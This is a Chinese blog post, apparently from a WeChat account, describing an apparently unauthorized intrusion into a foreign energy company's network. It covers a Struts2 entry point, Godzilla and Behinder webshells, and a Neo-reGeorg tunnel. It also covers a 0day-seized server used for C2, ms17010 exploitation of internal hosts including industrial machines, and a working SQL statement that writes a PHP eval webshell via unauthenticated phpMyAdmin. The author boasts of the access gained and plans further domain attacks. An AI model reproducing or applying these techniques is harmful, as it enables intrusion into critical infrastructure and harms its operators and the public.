Skip to content

Latest commit

 

History

History
180 lines (84 loc) · 3.76 KB

[T大4的小圈圈]-2023-7-23-对某国能源打点(上).md

File metadata and controls

180 lines (84 loc) · 3.76 KB

对某国能源打点(上)

原创 T4x0r T大4的小圈圈

T大4的小圈圈

微信号 T4x0rhhhhh

功能介绍 分享web渗透实战,ctf wp等,网络安全相关的。还在成长ing


__发表于

收录于合集

此次渗透非常感谢HashRun安全团队HashMeow小组成员协作;感谢如下师傅:闲客,伊恒,秋风,fish

当然,这次渗透下来的目标的网段和资产挺不错的,某国第三大能源,网段在国家骨干网络
入口

主域名 https://www.xxxxx.com

漏洞链接

https://vms.xxxxx.com:xxxx/xxxxxxx/xxxxxx.action

漏洞名称 Struts2

哥斯拉🐎

https://vms.xxxxx.com:xxxx/xxxxxxx/ll.jsp

冰蝎4.0.5 Xor_base64协议

https://vms.xxxxxx.com:xxxxx/xxxxx/xxxxx.jsp

Neo-regeorg 隧道 密码lan

https://vms.xxxx.com:xxx/xxxxxx/tunnel.jsp

这部分也是通过信息收集,看到.action直接st2一把梭

代理机部署

因为这次行动是在疫情,xj疫情当时大家应该都知道,公司没办法给我们提供匿名服务器,所以我们只能自己打一台下来,然后部署c2

伊恒哥哥一个 0day 梭哈下来一台bc,拿到bc之后我们开始搭建c2以及流量代理

外加c2

内网信息收集

简单扫大概扫下

虽然有几个段重了,问题不大,我们大概看了一下 估计 有6个域以上,国外内网确实安全,大概最少有600台机器(保守点估计)然后发现弱口基本就在2位数,ms17010也就个位数

先把ms17010打了,发现一个坑点,msf不能打03,08并且很容易打崩,换上大佬工具,梭哈

不全部放图了,因为千篇一律,我们接下来看下域,发现都在域内

然后大佬工具自带rdp登录模板,直接开启rdp登录

发现不是远程登录组,先放下

因为入口是Linux机器,不太好当鼠标猴子,虽然有cross2加持,我们继续寻找内网中出网的机器,前面几台ms17010下来的机器进行出网探测均发现只有dns出网,然后exe丢上去稍稍有点麻烦,先放下,去看下web资产能不能getshell几个找个出网的win,毕竟内网中有几k台机器呢,总有一个出网win

然后又发现一些未授权的

弱口

太多了,不截图了

发现也没啥太大用处,先放下,继续往下看,发现一个oracle

是个普通权限,我记得是可以直接弹回shell的

ok找到一个win发现还是tm不出网,只有dns出,很麻烦,上传exe又要走出口机

后续又发现一些弱口和未授权

这些机器大多也是工业机器

最后找到一台所有协议都出网的win

http://10.36.32.36/?phpinfo=1进phpinfo,找到绝对路径C:wamp/www

http://10.36.32.36/phpmyadmin/未经授权进到phpmyadmin,查看权限是all

在数据表的sql直接写入

select "<?php @eval($_POST[cc]);?>" into outfile 'C:/wamp/www/shell.php'

http://10.36.32.36/log.php成功

蚁剑挂代理验证

后续,还没在c2上上线这个win,因为我在准备期末考试,期末考完之后,我又被别人支配的去整代码审计,整完这些快过年了

下一步计划就是经行域渗透吧,整整pth,ptt,ptk等,这些,到时候再更新

预览时标签不可点

微信扫一扫
关注该公众号

知道了

微信扫一扫
使用小程序


取消 允许


取消 允许

: , 。 视频 小程序 赞 ,轻点两下取消赞 在看 ,轻点两下取消在看